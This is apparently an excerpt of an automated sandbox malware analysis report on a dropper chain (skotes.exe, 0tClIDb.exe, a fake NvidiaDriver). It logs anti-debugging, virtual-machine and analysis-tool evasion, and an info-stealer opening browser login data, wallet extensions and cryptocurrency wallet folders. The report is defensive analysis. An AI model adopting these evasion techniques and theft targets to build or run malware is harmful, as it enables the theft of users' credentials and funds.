                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7800Thread sleep time: -360000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712Thread sleep count: 40 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7712Thread sleep time: -80040s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704Thread sleep time: -72036s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7716Thread sleep time: -30015s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe TID: 8004Thread sleep time: -150000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe TID: 8000Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe TID: 6208Thread sleep count: 289 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe TID: 6208Thread sleep count: 523 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe TID: 4548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 7088Thread sleep count: 6019 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 7088Thread sleep count: 3450 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 3244Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe TID: 3604Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe TID: 3368Thread sleep count: 2037 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe TID: 3368Thread sleep count: 1843 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 1308Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 4040Thread sleep count: 409 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 4040Thread sleep count: 1381 > 30
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe TID: 7240Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe TID: 7240Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 4908Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe TID: 7316Thread sleep count: 198 > 30
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\Temp\NvidiaDriverJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile opened: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeJump to behavior
                        Source: skotes.exe, skotes.exe, 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2300627232.0000000000CBE000.00000080.00000001.01000000.00000007.sdmp, 0tClIDb.exe, 0tClIDb.exe, 00000007.00000002.2680309900.0000000000FAD000.00000040.00000001.01000000.00000009.sdmp, file.exe, skotes.exe.0.drBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: skotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837356691.000000000143E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                        Source: 9DNEMG3H6COYF8VY.exe, 00000009.00000002.2685107894.0000000000C23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679731438.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837425187.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: file.exe, 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1724303378.0000000000CBE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmp, 0tClIDb.exe, 00000007.00000002.2680309900.0000000000FAD000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: file.exe, skotes.exe.0.drBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: NvidiaDriver.exe, 0000000A.00000002.2893624122.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AA0250 Start: 04AA04BB End: 04AA038E0_2_04AA0250
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0533041D Start: 0533059A End: 0533042E6_2_0533041D
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: SIWVID
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AA0C3B rdtsc 0_2_04AA0C3B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C652B mov eax, dword ptr fs:[00000030h]0_2_004C652B
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CA302 mov eax, dword ptr fs:[00000030h]0_2_004CA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AFA302 mov eax, dword ptr fs:[00000030h]1_2_00AFA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AF652B mov eax, dword ptr fs:[00000030h]1_2_00AF652B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AFA302 mov eax, dword ptr fs:[00000030h]2_2_00AFA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AF652B mov eax, dword ptr fs:[00000030h]2_2_00AF652B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AFA302 mov eax, dword ptr fs:[00000030h]6_2_00AFA302
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AF652B mov eax, dword ptr fs:[00000030h]6_2_00AF652B
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe "C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe" --vision
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe "C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe"
                        Source: skotes.exe, skotes.exe, 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmp, 0tClIDb.exe, 0tClIDb.exe, 00000007.00000002.2680309900.0000000000FAD000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Program Manager
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADDD91 cpuid 6_2_00ADDD91
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeQueries volume information: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe VolumeInformation
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_004ACBEA
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC65E0 LookupAccountNameA,6_2_00AC65E0
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: 0tClIDb.exe, 00000007.00000003.2679328186.0000000005891000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2691969648.0000000005893000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2627897970.0000000005891000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 1.2.skotes.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.skotes.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.490000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.skotes.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 0tClIDb.exe PID: 7872, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                        Source: 0tClIDb.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                        Source: 0tClIDb.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                        Source: 0tClIDb.exeString found in binary or memory: Wallets/JAXX New Version
                        Source: 0tClIDb.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                        Source: 0tClIDb.exeString found in binary or memory: ExodusWeb3
                        Source: 0tClIDb.exe, 00000007.00000003.2568363969.0000000000C7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
